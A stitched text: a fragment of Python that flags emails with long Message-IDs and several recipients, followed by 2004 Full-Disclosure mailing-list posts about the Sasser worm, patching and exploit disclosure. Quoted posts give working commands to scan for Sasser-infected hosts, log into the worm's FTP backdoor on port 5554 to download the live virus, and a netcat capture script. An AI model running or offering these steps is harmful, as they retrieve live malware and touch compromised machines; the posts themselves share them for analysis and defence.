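    """Number of addresses across To and Cc (the fault needs more than one)."""
    msg = email.message_from_bytes(raw_message, policy=policy.compat32)
    pairs = email.utils.getaddresses(msg.get_all("To", []) + msg.get_all("Cc", []))
    return sum(1 for _, addr in pairs if addr)


def check_message(raw_message: bytes, limit: int = DEFAULT_LIMIT) -> dict:
    """Flag a message as risky when its ID exceeds `limit` and it has several recipients."""
    mid_len = message_id_length(raw_message)
    rcpts = recipient_count(raw_message)
    return {"message_id_bytes": mid_len, "recipients": rcpts,
            "risky": mid_len > limit and rcpts > 1}


def build_sample(msg_id: str, to: str, cc: str = "", fold_at: int = 72) -> bytes:
    """Construct a minimal raw message for testing; long headers are folded as an MTA would."""
    header = "Message-ID: " + msg_id
    folded = "\r\n ".join(header[i:i + fold_at] for i in range(0, len(header), fold_at))
    lines = ["From: sender@example.test", "To: " + to]
    if cc:
        lines.append("Cc: " + cc)
    lines += ["Subject: Test Email", folded, "", "Hallo", "123", ""]
    return "\r\n".join(lines).encode("ascii")
```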



[Full-Disclosure] Registry Watcher

2004-05-08 Thread RandallM
Hi,

Are there any programs out there that watch for changes to the registry and
can give an alert?

 

My intention for this is only because of my limited knowledge of the Windows
registry. As I understand it, no processes, applications or programs run
without entries in the registry. This, it seems, includes virus and Trojan
installations. There are the common entries that belong in the registry that
the common installation inserts, and all programs have values that must be
inserted. If a watcher had a database to follow, any odd or uncommon entries
could be flagged. As far as I know all newly found viruses insert registry
entries, and these could be placed in a database that would cause the
registry to deny and flag them. Wouldn't this in a sense be a firewall and
virus protection method, or am I really off base in my understanding? I know
that such an approach is used by AdWatch and other types of tools, but I have
never seen anything mentioned for protection against backdoors, Trojans and
viruses. If such a program does not exist I'd appreciate any input on
building one.

 

thank you

Randall M

 

 




[Full-Disclosure] RE: Full-Disclosure digest, Catching Sasser

2004-05-04 Thread RandallM



Hot damn, can't wait to get to work and try this on our network!


|--__--__--
|
|Message: 19
|From: Shashank Rai [EMAIL PROTECTED]
|Reply-To: [EMAIL PROTECTED]
|To: [EMAIL PROTECTED]
|Organization: Etisalat NIS
|Date: Tue, 04 May 2004 11:40:12 +0400
|Subject: [Full-Disclosure] Catching Sasser
|
|Hi all,
|for people who did not have the privilege of getting infected with
|sasser ;) because of firewall/AV/patch or they are smart enough to use
|Linux (like me, hey now no flame war on this *please*), here is a
|simple way to catch sasser:
|
|Step 1: Scanning for infected machines (from a Linux box):
|-
|Get doscan from: http://www.enyo.de/fw/software/doscan/
|
|compile n run:
|# doscan -A 50 -b 512 -c 100 -i -p 5554 -P tcp -r "200 OK$" -v <IP RANGE>
|
|This will give you list of infected machines.
|
|Step Two: Getting the virus
|---
|Copy the following set of commands into a file (or type them from the ftp
|prompt):
|-ftp_commands--
|open <infected m/c IP> 5554
|anonymous
|user
|bin
|get 7584_up.exe
|bye
|--
|then from the cmd prompt of your *windows* machine, run:
|
|c:\>ftp -s:ftp_commands
|
|This will fetch you a copy of the virus as 7584_up.exe.
|The ftp_commands file actually logs into the ftp server of sasser on port
|5554 of the infected machine with username "anonymous" and password
|"user", and then issues a PORT command to download the virus.
|
|
|PS: USE THIS SET OF INSTRUCTIONS AT YOUR OWN RISK. BY EXECUTING THE
|DOWNLOADED FILE YOU WILL INFECT YOUR SYSTEM.
|
|In case you are running any AV with real-time protection features, it
|should immediately detect the virus!!!
|
|cheers,
|--
|Shashank Rai
|
|Network and Information Security Team,
|Emirates Telecommunication Corporation,
|Abu Dhabi, U.A.E.
|Ph: +971-2-6182523   Office
|+971-50-6670648  Cell
|GPG key:
|http://pgp.cns.ualberta.ca:11371/pks/lookup?op=vindex&search=0x01B79474026E36F5
|
|



[Full-Disclosure] RE: Full-Disclosure YOU know what blows me away.

2004-05-03 Thread RandallM
You know what blows me away. People who can in one breath write the info
like youssef below and what others on this list have written. And that most
of you are probably not older than 25 years old. You hacked your first box
when you were 2 and flunked kindergarten class because your teacher didn't
know C. Man, if I could get this list to write a book what a treasure it
would be.

I play CounterStrike on hacking servers and it blows me away that some of
these 14yr olds are writing in C+ to code their own hacks. You know what I
did when I was 14? I don't. G.I Joes humping my sister's Barbie's I guess.

|--__--__--
|
|Message: 14
|Date: Mon, 3 May 2004 17:58:04 +0200 (CEST)
|From: youssef ALAOUI [EMAIL PROTECTED]
|To: [EMAIL PROTECTED]
|Subject: [Full-Disclosure] Unpacking Sasser
|
|HI,
|
|You can use PEiD to try to unpack Sasser (http://peid.has.it/)
|
|you can also catch this worm by creating a shell script called catch.sh
|
|catch.sh would contain two lines :
|
|nc -l -p 445 > ~/catched.dump$$
|./catch.sh &
|
|then you just have to launch it : ./catch.sh &
|
|that will create files with random names for each incoming connection to
|port 445 containing a dump of the traffic in your home directory.
|
|Tek Rulez
|
|
|ALAOUI ABDELLAOUI Youssef alias ANALYSTE
|Delegue Promo 2008
|-{Epitech}- European Institute of Technology
|



[Full-Disclosure] RE: Full-Disclosure digest, new LSASS - Javier

2004-05-03 Thread RandallM
Javier,
Boy are you hitting the head on the nail. There I was getting ready to patch
all the machines I could that day (I had posted here about getting help in
that direction a man's gotta patch) and while I had a cd in my hand
getting ready to insert it, up popped the LSASS Vulnerability error and
restart in 60 seconds! Well, I shut it down, booted with no network and
patched and everything came out ok. Whew!

|--__--__--
|
|Message: 4
|Date: Mon, 03 May 2004 10:45:35 +0200
|From: Javier Fernandez-Sanguino [EMAIL PROTECTED]
|Organization: Germinus
|To: Ben Ryan [EMAIL PROTECTED]
|CC: [EMAIL PROTECTED], [EMAIL PROTECTED],
|   [EMAIL PROTECTED]
|Subject: [Full-Disclosure] Re: New LSASS-based worm finally here (Sasser)
|
|Ben Ryan wrote:
|
|> As expected, LSASS exploit-based worm seems to have arrived. Fasten your
|> seatbelts, those unpatched please use the spew bags provided :)
|> I hope PSS resolves the issues discussed in KB835732.
|
|What's more disturbing is that this worm has established a new record
|for Microsoft worms [1]. Blaster was the fastest worm (25 days since
|the patch was published to the worm), this one has been even faster
|(17 days for the first variant since the patch was published to the
|worm). Of course, I'm not considering the fact that this issue was
|known, at least to eEye and Microsoft, for over 5 months.
|
|Regards
|
|Javier
|
|[1] Approaching the record of worms in other OS, which, I believe, is
|held by Scalper (10 days from patch to worm). But hey, they could
|browse the source changes for that one.
|
|
|--__--__--
|



[Full-Disclosure] [ Full-Disclosure] A mans got to patch

2004-04-30 Thread RandallM


thank you
Randall M
 

To my mentors:

Let me first give a short history of my situation. I work for a company that
began 10 years ago with three Mac servers and about 25 Mac workstations. 10
years later they have 34 servers, 345 PC workstations and 60 G4/G5 Macs in 5
locations around the USA.



I have been in the IT area for one and half years. I have worked for this
company for one year. Patching was not done as needed due to the growth and
continuous requirements put on the two Techs. For the last three days I have
seen what I believe to be Agobot exploits (searching on names found in the
registry were said to be associated with such). 

I have been reading this list for about three weeks now. I have become more
aware of dangers that await. Frankly I'm scared to death :) I want to begin
the tedious task of patching the servers and workstations and can think of no
better place than here to get some of what I feel would be very expert advice
on doing this in the best fashion.

Our current environment: Moved to an AD domain this year. We still have a
mixed member server environment with some of the NTs still on Explorer 5.5 (I
can hear some here thinking give me your IP! :) ). I have gone through some of
the servers with Microsoft security scanner and with some I simply went to the
update area. Many had never visited there before, as the initial visit loads
the scanner engine. The weakness here is the norm for the workstations also.
We do tape backups nightly. Some of our main problems are the programs that
are still used can't be repaired easily, such as Dynamics. Also some
servers are running programs that we could never place back on because they
had to be sent off to be loaded by the experts of the software companies.
Another example is the web server, which is hanging on by a thread. They paid
nearly $175,000 8 years ago for their online presence. That is no longer
supported and we don't know a damn thing about it except to keep it going!

So here you see my need. My guess is that I have to know something of the
risks with certain patches so as not to get myself in trouble losing
sensitive material and such, not to mention my job, for pushing for this to be
done. I don't see this as a simple visit to Windows Update. Your advice
would be greatly appreciated. I don't mind saying I'm scared to death.

Randall M



Re: [Full-Disclosure] no more public exploits: just a n00bie view

2004-04-27 Thread RandallM
Hey,
I have to agree with Borg. I am of course new to your list. I joined it to
learn the what, when and where of security. I must say that when I saw
exploits posted I was a bit taken aback. My first thought was "Guess I can
expect to see it soon." A question naturally comes; would it show in the
wild had it not been posted? And what percentage of exploits do go in the
wild due to being posted along with the advisory? Then again, how can I be
concerned about an advisory if I can't see the effects of the exploit? Of
course, then again, I really have understood little about the code of the
exploit but did a lot on the advisory. Just a n00bie view.

Borg wrote:


Message: 28
Date: Tue, 27 Apr 2004 13:19:44 -0400
From: chris [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] no more public exploits

Here's my two cents :-/

Exploit code is better kept private.
Advisories should be public.

Why?

Because exploit code is not easy to write depending on the bug. And I
for one sure don't want some 'penetration tester' taking my code and
plugging it into his automated scanner and collecting the cash. I'm far
too greedy to watch that happen. Sorry.

NON-Disclosure of Exploit code.
Full-Disclosure of Advisories.

As far as the discussion of sysadmins patching on time or not. All I
will say is this . . .  if they did patch on time there wouldn't be a
www.zone-h.org.

- borg (ChrisR-)

--__--__--



Borg ended.



[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1605 - 14 msgs

2004-04-26 Thread RandallM
Asking for suggestions on best methods, equipment and experience to set up a
test lab. I am more than anxious to learn and build my experience.

thank you
Randall M




[Full-Disclosure] RE: Full-Disclosure Super Worm

2004-04-18 Thread RandallM


thank you
Randall M
William,
My job is to support a sales force using laptops. Also customer service reps.
That silly scanning gets in the way and slows progress! Not only have
they not learned, but they don't care! I pull my hair out trying to come up
with ways to support them and protect the network. Any advice welcomed.

Randall M.

--__--__--

Message: 8
Date: Sun, 18 Apr 2004 09:33:38 -0400
From: William Warren [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Super Worm

I bet most have not learned from blaster.  Sure a number of users may
have gotten protected but I bet a majority are not.




